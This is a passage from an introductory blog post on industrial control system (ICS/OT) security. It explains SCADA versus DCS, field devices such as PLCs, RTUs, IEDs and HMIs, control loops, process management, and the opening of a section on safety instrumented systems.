i.e., <code>Physical</code> and <code>Logical</code>\n<ul>\n<li class=\"\"><code>Physical Assets</code> are tangible hardware devices used in industrial environments; often includes assets like workstation, server, n/w switch, PLC, sensors, actuators, or broadly anything that uses a micro-controller or a microprocessor.</li>\n<li class=\"\"><code>Logical Assets</code> are those assets that reside on the physical asset; such as process graphic, database, logic program, firewall rule, firmware, etc.</li>\n</ul>\n</li>\n</ul>\n<blockquote>\n<p><strong>Summary,</strong> <br>\n<em>Hardware</em> = <strong>Physical Asset</strong> and <br>\n<em>Software/Data/Config</em> = <strong>Logical Asset</strong></p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"15-types-of-control-system-architectures\">1.5 Types of Control System Architectures<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#15-types-of-control-system-architectures\" class=\"hash-link\" aria-label=\"Direct link to 1.5 Types of Control System Architectures\" title=\"Direct link to 1.5 Types of Control System Architectures\" translate=\"no\">​</a></h3>\n<p>We will look into two primary ones for now -</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"151-supervisory-control-and-data-acquisition-scada\">1.5.1 Supervisory Control and Data Acquisition (SCADA)<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#151-supervisory-control-and-data-acquisition-scada\" class=\"hash-link\" aria-label=\"Direct link to 1.5.1 Supervisory Control and Data Acquisition (SCADA)\" title=\"Direct link to 1.5.1 Supervisory Control and Data Acquisition (SCADA)\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>SCADA</strong> is a <mark>centralized system that supervises and collects data from many remote field devices spread over a large geographic area.</mark></li>\n<li class=\"\">Provides analytics to opertors .</li>\n<li class=\"\">Operators can send control commands back to the field.</li>\n</ul>\n<blockquote>\n<p><em><strong>But why we need SCADA in the first place?</strong></em>\n<br> Before SCADA, industries with spread-out assets (like power lines or pipelines) relied on manual monitoring. People had to physically travel to remote sites to read gauges and operate equipment. This was slow, expensive, dangerous, and inefficient.<br>\n<strong>SCADA was developed to enable remote monitoring and supervisory control from a central location, reducing the need for on-site personnel.</strong></p>\n</blockquote>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"152-distributed-control-systems-dcs\">1.5.2 Distributed Control Systems (DCS)<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#152-distributed-control-systems-dcs\" class=\"hash-link\" aria-label=\"Direct link to 1.5.2 Distributed Control Systems (DCS)\" title=\"Direct link to 1.5.2 Distributed Control Systems (DCS)\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\">DCS is a highly integrated, real time control system where multiple controllers are distributed throughout a single plant.</li>\n<li class=\"\">The controllers communicate with each other and operator continuously.</li>\n<li class=\"\">DCS excel at closed loop control - <em>systems whose action depends on the measured output through a feedback path</em>.</li>\n</ul>\n<blockquote>\n<p><em><strong>But why we need DCS in first place?</strong></em>\n<br> Large process plants (refineries, chemical plants) had thousands of control loops. Traditional centralized control using a centralized system was risky as if the central computer failed, the whole plant could shut down dangerously.\n<br> <strong>DCS was created to distribute control across many processors so that failure in one area doesn’t stop the entire plant.</strong> It also made complex, continuous automation easier and safer.</p>\n</blockquote>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"153-difference-between-scada-and-dcs\">1.5.3 Difference between SCADA and DCS<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#153-difference-between-scada-and-dcs\" class=\"hash-link\" aria-label=\"Direct link to 1.5.3 Difference between SCADA and DCS\" title=\"Direct link to 1.5.3 Difference between SCADA and DCS\" translate=\"no\">​</a></h4>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<table><thead><tr><th>Aspect</th><th>SCADA (Supervisory Control and Data Acquisition)</th><th>DCS (Distributed Control System)</th></tr></thead><tbody><tr><td><strong>Primary Purpose</strong></td><td>Monitoring and supervisory control of geographically distributed systems</td><td>Precise, continuous, real-time process control within a plant</td></tr><tr><td><strong>Geographic Scope</strong></td><td>Wide-area operations spanning hundreds of kilometers</td><td>Single facility, plant, or industrial site</td></tr><tr><td><strong>Control Speed</strong></td><td>Relatively slower response (seconds to minutes)</td><td>Extremely fast response (milliseconds)</td></tr><tr><td><strong>Control Style</strong></td><td>Mostly supervisory or open-loop control</td><td>Closed-loop automatic process control</td></tr><tr><td><strong>Number of I/O Points</strong></td><td>Thousands of distributed I/O points</td><td>Tens of thousands of highly dense I/O points</td></tr><tr><td><strong>Redundancy Level</strong></td><td>Moderate to high redundancy for reliability</td><td>Very high redundancy for safety and uninterrupted operation</td></tr><tr><td><strong>Typical Industries</strong></td><td>Utilities, power transmission, water distribution, pipelines, railways, oil &amp; gas transmission</td><td>Refineries, chemical plants, power generation, pharmaceuticals, pulp &amp; paper industries</td></tr><tr><td><strong>Typical Devices Used</strong></td><td>RTUs, PLCs, master stations, communication networks, HMI systems</td><td>Distributed controllers, I/O modules, engineering stations, redundant servers</td></tr><tr><td><strong>Communication Focus</strong></td><td>Long-distance communication over WAN, radio, fiber, or satellite</td><td>High-speed local communication within plant networks</td></tr><tr><td><strong>Risk if System Fails</strong></td><td>Loss of monitoring visibility and delayed operator response</td><td>Potential plant shutdown, production loss, or major safety incidents</td></tr><tr><td><strong>Scalability</strong></td><td>Highly scalable across remote locations</td><td>Scalable mainly within a single industrial process facility</td></tr><tr><td><strong>System Architecture</strong></td><td>Centralized supervisory architecture with remote field devices</td><td>Distributed intelligence across multiple controllers</td></tr><tr><td><strong>Data Handling</strong></td><td>Event-driven data collection and monitoring</td><td>Continuous real-time process data handling</td></tr><tr><td><strong>Cost</strong></td><td>Generally lower implementation and maintenance cost</td><td>Higher cost due to redundancy, integration, and precision control</td></tr></tbody></table>\n<blockquote>\n<p>In today's world, <em>lines between DCS and SCADA have almost blurred</em>, nowadays we take a <strong>hybrid systems approach</strong>;\n<br> <em>A large facility has DCS for precise control inside the plant while SCADA system sits on top to monitor the entire facility or multiple facilities from a central control room.</em></p>\n</blockquote>\n<div class=\"diagram-container\">\n<figure>\n<svg class=\"diagram-svg\" viewBox=\"0 0 780 250\" xmlns=\"http://www.w3.org/2000/svg\">\n  <rect x=\"30\" y=\"80\" width=\"180\" height=\"70\" rx=\"14\" fill=\"rgba(13,63,145,0.12)\" stroke=\"#4c7ece\"></rect>\n  <text x=\"120\" y=\"110\" text-anchor=\"middle\" class=\"diagram-title\">SCADA Master</text>\n  <text x=\"120\" y=\"130\" text-anchor=\"middle\" class=\"diagram-text\">Remote monitoring</text>\n  <rect x=\"260\" y=\"40\" width=\"140\" height=\"60\" rx=\"14\" fill=\"rgba(13,63,145,0.12)\" stroke=\"#4c7ece\"></rect>\n  <text x=\"330\" y=\"75\" text-anchor=\"middle\" class=\"diagram-title\">RTU 1</text>\n  <rect x=\"260\" y=\"140\" width=\"140\" height=\"60\" rx=\"14\" fill=\"rgba(13,63,145,0.12)\" stroke=\"#4c7ece\"></rect>\n  <text x=\"330\" y=\"175\" text-anchor=\"middle\" class=\"diagram-title\">RTU 2</text>\n  <rect x=\"470\" y=\"80\" width=\"180\" height=\"70\" rx=\"14\" fill=\"rgba(13,63,145,0.12)\" stroke=\"#4c7ece\"></rect>\n  <text x=\"560\" y=\"110\" text-anchor=\"middle\" class=\"diagram-title\">DCS</text>\n  <text x=\"560\" y=\"130\" text-anchor=\"middle\" class=\"diagram-text\">Plant-level control</text>\n  <line x1=\"210\" y1=\"110\" x2=\"260\" y2=\"70\" stroke=\"#4c7ece\" marker-end=\"url(#arrow)\"></line>\n  <line x1=\"210\" y1=\"110\" x2=\"260\" y2=\"170\" stroke=\"#4c7ece\" marker-end=\"url(#arrow)\"></line>\n  <line x1=\"400\" y1=\"90\" x2=\"470\" y2=\"110\" stroke=\"#4c7ece\" marker-end=\"url(#arrow)\"></line>\n  <line x1=\"400\" y1=\"170\" x2=\"470\" y2=\"130\" stroke=\"#4c7ece\" marker-end=\"url(#arrow)\"></line>\n  <defs>\n    <marker id=\"arrow\" viewBox=\"0 0 10 10\" refX=\"10\" refY=\"5\" markerWidth=\"4\" markerHeight=\"4\" orient=\"auto-start-reverse\">\n      <path d=\"M 0 0 L 10 5 L 0 10 z\" fill=\"#4c7ece\"></path>\n    </marker>\n  </defs>\n</svg>\n<figcaption class=\"diagram-caption\"><strong>Fig 1.3:</strong> SCADA supervises remote field equipment, while DCS keeps control locally inside the plant for fast real-time action.</figcaption>\n</figure>\n</div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"16-field-componentssystem-assets\">1.6 Field Components/System Assets<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#16-field-componentssystem-assets\" class=\"hash-link\" aria-label=\"Direct link to 1.6 Field Components/System Assets\" title=\"Direct link to 1.6 Field Components/System Assets\" translate=\"no\">​</a></h3>\n<p>Field components are the <mark>physical devices and systems deployed in industrial environments that directly interface with processes, equipment, and infrastructure to enable monitoring, control, and automation.</mark> These form the backbone of any ICS architecture.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"161-programmable-logic-controller-plc\">1.6.1 Programmable Logic Controller (PLC)<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#161-programmable-logic-controller-plc\" class=\"hash-link\" aria-label=\"Direct link to 1.6.1 Programmable Logic Controller (PLC)\" title=\"Direct link to 1.6.1 Programmable Logic Controller (PLC)\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>PLCs</strong> are <mark>specialized industrial grade computers designed to perform repetitive control tasks in harsh environments with high reliability.</mark></li>\n<li class=\"\">Unlike desktop computers, <em>PLCs are physically hardened</em> making them suitable for production environment.</li>\n<li class=\"\">Instead of using a commercial OS, PLCs rely on specific application programs that allow the PLC to function automatically generating output actions (e.g.\nto pump motors) in response to specific inputs (e.g. from sensors) with as little\noverhead as possible.</li>\n<li class=\"\">PLCs were <mark>originally designed to replace electromechanical\nrelays.</mark></li>\n<li class=\"\">Very simple PLCs may be referred to as programmable logic relays (PLRs).</li>\n<li class=\"\">They execute logic programs written in languages like <em>Ladder Logic, Sequential Function Charts, Structured Text, or Function Block Diagrams</em>.</li>\n<li class=\"\">Common IEC 61131-3 PLC programming languages include:\n<ul>\n<li class=\"\"><strong>Ladder Diagram (LD)</strong>: Visual rung-based logic that looks like electrical ladder wiring.</li>\n<li class=\"\"><strong>Function Block Diagram (FBD)</strong>: Blocks with inputs and outputs wired together for modular control.</li>\n<li class=\"\"><strong>Structured Text (ST)</strong>: High-level text code similar to Pascal for math and advanced logic.</li>\n<li class=\"\"><strong>Sequential Function Chart (SFC)</strong>: Step-based charts used for batch and sequential operations.</li>\n</ul>\n</li>\n<li class=\"\">PLCs are ideal for discrete control applications (manufacturing, assembly lines) with deterministic, repetitive operations.</li>\n<li class=\"\">Typical lifespan: 15-30+ years; require scheduled maintenance but can run continuously.</li>\n<li class=\"\">Examples: Siemens S7 series, Allen-Bradley CompactLogix, BECKHOFF CX series.</li>\n</ul>\n<div class=\"diagram-container\">\n<figure>\n<img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://upload.wikimedia.org/wikipedia/commons/5/5a/Programmable_logic_controller.jpg\" alt=\"PLC hardware rack and I/O modules\">\n<figcaption class=\"diagram-caption\"><strong>Fig 1.5:</strong> PLC hardware and I/O modules, showing the physical control device used in many industrial systems.</figcaption>\n</figure>\n</div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"162-remote-terminal-unit-rtu\">1.6.2 Remote Terminal Unit (RTU)<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#162-remote-terminal-unit-rtu\" class=\"hash-link\" aria-label=\"Direct link to 1.6.2 Remote Terminal Unit (RTU)\" title=\"Direct link to 1.6.2 Remote Terminal Unit (RTU)\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>RTUs</strong> are <mark>ruggedized, autonomous control devices deployed at remote field sites to collect sensor data, execute pre-programmed logic, and communicate with master SCADA systems.</mark></li>\n<li class=\"\">They are optimized for wide-area communication and can function independently if the master station fails.</li>\n<li class=\"\">Often used in power distribution, water systems, oil/gas pipelines, and utilities where sites are geographically spread out.</li>\n<li class=\"\">Examples: Schweitzer Engineering RTUs, GE Automation RTUs, Woodward RTUs.</li>\n</ul>\n<div class=\"diagram-container\">\n<figure>\n<img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://upload.wikimedia.org/wikipedia/commons/d/d0/Remote_Terminal_Unit_Modular.jpg\" alt=\"Remote Terminal Unit (RTU) hardware module\">\n<figcaption class=\"diagram-caption\"><strong>Fig 1.6:</strong> Remote Terminal Unit (RTU) hardware showing the modular architecture used in remote field deployments for autonomous data collection and control.</figcaption>\n</figure>\n</div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"163-intelligent-electronic-device-ied\">1.6.3 Intelligent Electronic Device (IED)<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#163-intelligent-electronic-device-ied\" class=\"hash-link\" aria-label=\"Direct link to 1.6.3 Intelligent Electronic Device (IED)\" title=\"Direct link to 1.6.3 Intelligent Electronic Device (IED)\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>IEDs</strong> are <mark>smart field devices that combine sensing, processing, and communication capabilities to perform localized control and protection functions.</mark></li>\n<li class=\"\">Common in power systems: protective relays, meters, circuit breakers, and reclosers that can make local decisions and communicate status.</li>\n<li class=\"\">More autonomous than basic sensors; capable of executing protection logic without central coordination.</li>\n<li class=\"\">Examples: Merlin Gerin Micom, ABB REL670, Schneider Electric Sepam relays.</li>\n</ul>\n<div class=\"diagram-container\">\n<figure>\n<img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://5.imimg.com/data5/VT/NA/UC/SELLER-22256257/process-bus-numerical-relay-siemens-500x500.jpg\" alt=\"Intelligent Electronic Device (IED) protective relay\">\n<figcaption class=\"diagram-caption\"><strong>Fig 1.7:</strong> Intelligent Electronic Device (IED) showing protective relay with sensing and communication capabilities for localized control in power systems.</figcaption>\n</figure>\n</div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"164-human-machine-interface-hmi\">1.6.4 Human Machine Interface (HMI)<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#164-human-machine-interface-hmi\" class=\"hash-link\" aria-label=\"Direct link to 1.6.4 Human Machine Interface (HMI)\" title=\"Direct link to 1.6.4 Human Machine Interface (HMI)\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>HMIs</strong> are <mark>the graphical and operational interfaces through which human operators monitor system status, visualize real-time process data, and issue control commands.</mark></li>\n<li class=\"\">Typically run on industrial PCs, tablets, or touch-screen panels.</li>\n<li class=\"\">Display: process flows, equipment status, alarms, historical trends, operator dashboards.</li>\n<li class=\"\">Modern HMIs integrate with SCADA/DCS systems to provide real-time visualization across multiple facilities.</li>\n<li class=\"\">Examples: Wonderware, GE DigitalWorks, Siemens WinCC, Ignition SCADA.</li>\n</ul>\n<div class=\"diagram-container\">\n<figure>\n<img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://static.blikai.com/prod/20240709/image%20(20).webp\" alt=\"Industrial HMI operator interface panel\">\n<figcaption class=\"diagram-caption\"><strong>Fig 1.8:</strong> Human Machine Interface (HMI) displaying real-time process visualization, status indicators, and operator control dashboard.</figcaption>\n</figure>\n</div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"165-supervisory-workstations\">1.6.5 Supervisory Workstations<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#165-supervisory-workstations\" class=\"hash-link\" aria-label=\"Direct link to 1.6.5 Supervisory Workstations\" title=\"Direct link to 1.6.5 Supervisory Workstations\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Supervisory Workstations</strong> are <mark>engineering or operator workstations running software for system configuration, monitoring, diagnostics, and remote troubleshooting.</mark></li>\n<li class=\"\">Used by system engineers to program PLCs, configure RTUs, analyze historical data, and update firmware.</li>\n<li class=\"\">Higher privilege levels than standard operator consoles; critical for maintaining system integrity.</li>\n<li class=\"\">Often air-gapped or restricted to internal networks for security.</li>\n<li class=\"\">Examples: Engineering Workstations (Siemens TIA Portal), DCS Configuration Stations.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"166-data-historian\">1.6.6 Data Historian<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#166-data-historian\" class=\"hash-link\" aria-label=\"Direct link to 1.6.6 Data Historian\" title=\"Direct link to 1.6.6 Data Historian\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Data Historians</strong> are <mark>specialized database systems that continuously record, archive, and provide access to time-series operational data collected from field devices.</mark></li>\n<li class=\"\">Enable trend analysis, root cause analysis, compliance reporting, and predictive maintenance.</li>\n<li class=\"\">Store massive volumes of sensor readings, alarms, events, and operator actions over years.</li>\n<li class=\"\">Critical for process optimization and regulatory compliance (e.g., FDA, EPA requirements).</li>\n<li class=\"\">Examples: OSIsoft PI, Wonderware Historian, Influx DB, Aspen InfoPlus.21.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"167-other-assets\">1.6.7 Other Assets<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#167-other-assets\" class=\"hash-link\" aria-label=\"Direct link to 1.6.7 Other Assets\" title=\"Direct link to 1.6.7 Other Assets\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Engineering Workstations</strong>: Systems used to develop, compile, and test control logic before deployment.</li>\n<li class=\"\"><strong>Network Infrastructure</strong>: Industrial switches, routers, firewalls, gateways designed for reliability and determinism.</li>\n<li class=\"\"><strong>Sensors &amp; Actuators</strong>: Analog and digital devices (pressure transmitters, temperature probes, solenoid valves, motors).</li>\n<li class=\"\"><strong>Safety Modules</strong>: Redundant computing units dedicated to safety-critical functions.</li>\n<li class=\"\"><strong>Wireless Devices</strong>: Industrial IoT sensors, mobile RTUs, wireless mesh networks in modern OT environments.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"17-system-operations\">1.7 System Operations<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#17-system-operations\" class=\"hash-link\" aria-label=\"Direct link to 1.7 System Operations\" title=\"Direct link to 1.7 System Operations\" translate=\"no\">​</a></h3>\n<p>System operations describe <mark>how ICS components interact, execute control logic, respond to process changes, and maintain operational continuity.</mark></p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"171-control-loops\">1.7.1 Control Loops<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#171-control-loops\" class=\"hash-link\" aria-label=\"Direct link to 1.7.1 Control Loops\" title=\"Direct link to 1.7.1 Control Loops\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\">A <strong>control loop</strong> is <mark>a sequence of operations where a system continuously measures a process variable, compares it to a desired setpoint, and adjusts an output to minimize the difference.</mark></li>\n<li class=\"\"><strong>Open-Loop Control</strong>: System executes a pre-programmed sequence without feedback; no automatic correction if conditions change. (Example: A timer-based pump that runs for exactly 30 minutes regardless of actual water level.)</li>\n<li class=\"\"><strong>Closed-Loop Control</strong>: System continuously monitors output, compares to setpoint, and adjusts to maintain desired state. (Example: Temperature control where a thermostat measures temperature and adjusts heater output to maintain setpoint.)</li>\n<li class=\"\">Closed-loop is more precise but more complex; open-loop is simpler but less adaptive.</li>\n</ul>\n<div class=\"diagram-container\">\n<figure>\n<svg class=\"diagram-svg\" viewBox=\"0 0 800 300\" xmlns=\"http://www.w3.org/2000/svg\">\n  <defs>\n    <marker id=\"feedbackArrow\" viewBox=\"0 0 10 10\" refX=\"8\" refY=\"5\" markerWidth=\"5\" markerHeight=\"5\" orient=\"auto-start-reverse\">\n      <path d=\"M 0 0 L 10 5 L 0 10 z\" fill=\"#4c7ece\"></path>\n    </marker>\n  </defs>\n  <rect x=\"30\" y=\"70\" width=\"140\" height=\"60\" rx=\"12\" fill=\"rgba(13,63,145,0.12)\" stroke=\"#4c7ece\" stroke-width=\"2\"></rect>\n  <text x=\"100\" y=\"95\" text-anchor=\"middle\" font-family=\"sans-serif\" font-weight=\"bold\" fill=\"#4c7ece\">Sensor</text>\n  <text x=\"100\" y=\"113\" text-anchor=\"middle\" font-family=\"sans-serif\" font-size=\"12\" fill=\"#4c7ece\">Measure process</text>\n  <path d=\"M 170 100 L 260 100\" stroke=\"#4c7ece\" stroke-width=\"2\" marker-end=\"url(#arrow)\"></path>\n  <rect x=\"260\" y=\"60\" width=\"170\" height=\"80\" rx=\"12\" fill=\"rgba(13,63,145,0.12)\" stroke=\"#4c7ece\" stroke-width=\"2\"></rect>\n  <text x=\"345\" y=\"95\" text-anchor=\"middle\" font-family=\"sans-serif\" font-weight=\"bold\" fill=\"#4c7ece\">Controller</text>\n  <text x=\"345\" y=\"113\" text-anchor=\"middle\" font-family=\"sans-serif\" font-size=\"12\" fill=\"#4c7ece\">Calculate correction</text>\n  <path d=\"M 430 100 L 490 100\" stroke=\"#4c7ece\" stroke-width=\"2\" marker-end=\"url(#arrow)\"></path>\n  <rect x=\"490\" y=\"70\" width=\"140\" height=\"60\" rx=\"12\" fill=\"rgba(13,63,145,0.12)\" stroke=\"#4c7ece\" stroke-width=\"2\"></rect>\n  <text x=\"560\" y=\"95\" text-anchor=\"middle\" font-family=\"sans-serif\" font-weight=\"bold\" fill=\"#4c7ece\">Actuator</text>\n  <text x=\"560\" y=\"113\" text-anchor=\"middle\" font-family=\"sans-serif\" font-size=\"12\" fill=\"#4c7ece\">Apply change</text>\n  <path d=\"M 560 130 L 560 170\" stroke=\"#4c7ece\" stroke-width=\"2\" marker-end=\"url(#arrow)\"></path>\n  <rect x=\"490\" y=\"170\" width=\"140\" height=\"50\" rx=\"12\" fill=\"rgba(13,63,145,0.12)\" stroke=\"#4c7ece\" stroke-width=\"2\"></rect>\n  <text x=\"560\" y=\"200\" text-anchor=\"middle\" font-family=\"sans-serif\" font-weight=\"bold\" fill=\"#4c7ece\">Process</text>\n  <path d=\"M 490 195 L 100 195 L 100 130\" fill=\"none\" stroke=\"#4c7ece\" stroke-width=\"2\" marker-end=\"url(#arrow)\"></path>\n</svg><p><text x=\"280\" y=\"185\" text-anchor=\"middle\" font-family=\"sans-serif\" font-size=\"12\" fill=\"#4c7ece\">Feedback Loop</text>\n<text x=\"115\" y=\"155\" text-anchor=\"start\" font-family=\"sans-serif\" font-size=\"11\" fill=\"#4c7ece\">Process State</text>\n</p>\n<figcaption class=\"diagram-caption\"><strong>Fig 1.4:</strong> Closed-loop control structure showing measurement, decision, actuation, and feedback.</figcaption>\n</figure>\n</div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"172-control-processes\">1.7.2 Control Processes<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#172-control-processes\" class=\"hash-link\" aria-label=\"Direct link to 1.7.2 Control Processes\" title=\"Direct link to 1.7.2 Control Processes\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\">\n<p><strong>Continuous Process Control</strong>: Maintains a process variable at a constant target value over time (e.g., maintaining reactor temperature at 150°C).</p>\n<ul>\n<li class=\"\">Uses analog signals and proportional/integral/derivative (PID) algorithms.</li>\n<li class=\"\">Common in refineries, chemical plants, power plants.</li>\n</ul>\n</li>\n<li class=\"\">\n<p><strong>Discrete/Batch Process Control</strong>: Executes a series of sequential operations to produce a product or complete a task (e.g., pharmaceutical batch processing, filling bottles, assembly steps).</p>\n<ul>\n<li class=\"\">Uses digital signals and state machines.</li>\n<li class=\"\">Common in manufacturing, packaging, food production.</li>\n</ul>\n</li>\n<li class=\"\">\n<p><strong>Hybrid Control</strong>: Combines continuous and discrete elements (e.g., a chemical plant that continuously controls temperature while performing discrete batch transitions).</p>\n</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"173-feedback-loops--feedback-systems\">1.7.3 Feedback Loops &amp; Feedback Systems<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#173-feedback-loops--feedback-systems\" class=\"hash-link\" aria-label=\"Direct link to 1.7.3 Feedback Loops &amp; Feedback Systems\" title=\"Direct link to 1.7.3 Feedback Loops &amp; Feedback Systems\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\">\n<p><strong>Negative Feedback</strong>: Output of a system is fed back and compared against input; deviations trigger corrective actions to restore equilibrium.</p>\n<ul>\n<li class=\"\">Most common in industrial control; provides stability.</li>\n<li class=\"\">Example: If pressure rises above setpoint, feedback triggers valve closure to reduce pressure.</li>\n</ul>\n</li>\n<li class=\"\">\n<p><strong>Positive Feedback</strong>: Output reinforces the input, causing the system to diverge further from equilibrium.</p>\n<ul>\n<li class=\"\">Rarely intentional in ICS; typically indicates a malfunction.</li>\n<li class=\"\">Example: A failing temperature sensor that causes heater to keep increasing temperature.</li>\n</ul>\n</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"174-production-information-management-pim\">1.7.4 Production Information Management (PIM)<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#174-production-information-management-pim\" class=\"hash-link\" aria-label=\"Direct link to 1.7.4 Production Information Management (PIM)\" title=\"Direct link to 1.7.4 Production Information Management (PIM)\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>PIM Systems</strong> are <mark>higher-level software systems that manage production scheduling, resource allocation, quality control, and coordination across multiple OT systems.</mark></li>\n<li class=\"\">Sit above SCADA/DCS layer; interface with enterprise planning systems.</li>\n<li class=\"\">Track production metrics: throughput, downtime, yield, energy consumption, material usage.</li>\n<li class=\"\">Enable traceability and compliance documentation (batch serialization, audit trails).</li>\n<li class=\"\">Examples: MES (Manufacturing Execution Systems), Production Planning Software.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"175-business-information-management-bim--integration\">1.7.5 Business Information Management (BIM) &amp; Integration<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#175-business-information-management-bim--integration\" class=\"hash-link\" aria-label=\"Direct link to 1.7.5 Business Information Management (BIM) &amp; Integration\" title=\"Direct link to 1.7.5 Business Information Management (BIM) &amp; Integration\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>BIM Systems</strong> are <mark>enterprise-level software (ERP, analytics, business intelligence) that consume aggregated OT data for business decision-making, financial reporting, and strategic planning.</mark></li>\n<li class=\"\">Connected to PIM and MES systems via data feeds and APIs.</li>\n<li class=\"\">Enable KPI monitoring, cost analysis, ROI calculation, supply chain optimization.</li>\n<li class=\"\">Bridge between operational technology and information technology domains.</li>\n<li class=\"\">Examples: SAP, Oracle ERP, Microsoft Dynamics, Tableau/Power BI analytics.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"18-process-management\">1.8 Process Management<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#18-process-management\" class=\"hash-link\" aria-label=\"Direct link to 1.8 Process Management\" title=\"Direct link to 1.8 Process Management\" translate=\"no\">​</a></h3>\n<p><strong>Process Management</strong> in ICS refers to <mark>the systematic approach to designing, monitoring, optimizing, and maintaining industrial processes to ensure safety, efficiency, quality, and compliance.</mark></p>\n<p><strong>Key Components:</strong></p>\n<ul>\n<li class=\"\">\n<p><strong>Process Design &amp; Documentation</strong>: Engineering specifications, process flow diagrams (PFDs), piping &amp; instrumentation diagrams (P&amp;IDs) that define how a process should operate.</p>\n</li>\n<li class=\"\">\n<p><strong>Standard Operating Procedures (SOPs)</strong>: Written procedures that operators must follow during normal operations, startups, shutdowns, and emergency situations.</p>\n</li>\n<li class=\"\">\n<p><strong>Performance Monitoring</strong>: Continuous tracking of KPIs such as throughput, energy efficiency, product quality, asset utilization, and safety metrics.</p>\n</li>\n<li class=\"\">\n<p><strong>Preventive &amp; Predictive Maintenance</strong>: Scheduled maintenance based on equipment age/hours (preventive) or equipment condition data/anomalies (predictive) to minimize unexpected failures.</p>\n</li>\n<li class=\"\">\n<p><strong>Change Management</strong>: Formal processes to evaluate, approve, test, and implement changes to process logic, equipment, or procedures to minimize risk of unintended consequences.</p>\n</li>\n<li class=\"\">\n<p><strong>Regulatory Compliance &amp; Auditing</strong>: Ensuring operations meet industry standards (IEC 61508, IEC 61511, NIST, NERC-CIP, EPA, FDA) and conducting regular audits and inspections.</p>\n</li>\n</ul>\n<blockquote>\n<p><strong>Why Process Management Matters:</strong><br>\nIndustrial processes involve significant capital investment, safety risks, and regulatory obligations. Uncontrolled or poorly managed processes lead to equipment failures, safety incidents, environmental violations, production losses, and financial penalties. Structured process management minimizes these risks while optimizing output.</p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"19-safety-instrumented-systems-sis\">1.9 Safety Instrumented Systems (SIS)<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#19-safety-instrumented-systems-sis\" class=\"hash-link\" aria-label=\"Direct link to 1.9 Safety Instrumented Systems (SIS)\" title=\"Direct link to 1.9 Safety Instrumented Systems (SIS)\" translate=\"no\">​</a></h3>\n<p><strong>Safety Instrumented Systems</strong> are <mark>specialized, independent control systems designed to automatically detect hazardous conditions and execute fail-safe actions to prevent accidents, equipment damage, or environmental harm.</mark></p>\n<p><strong>Key 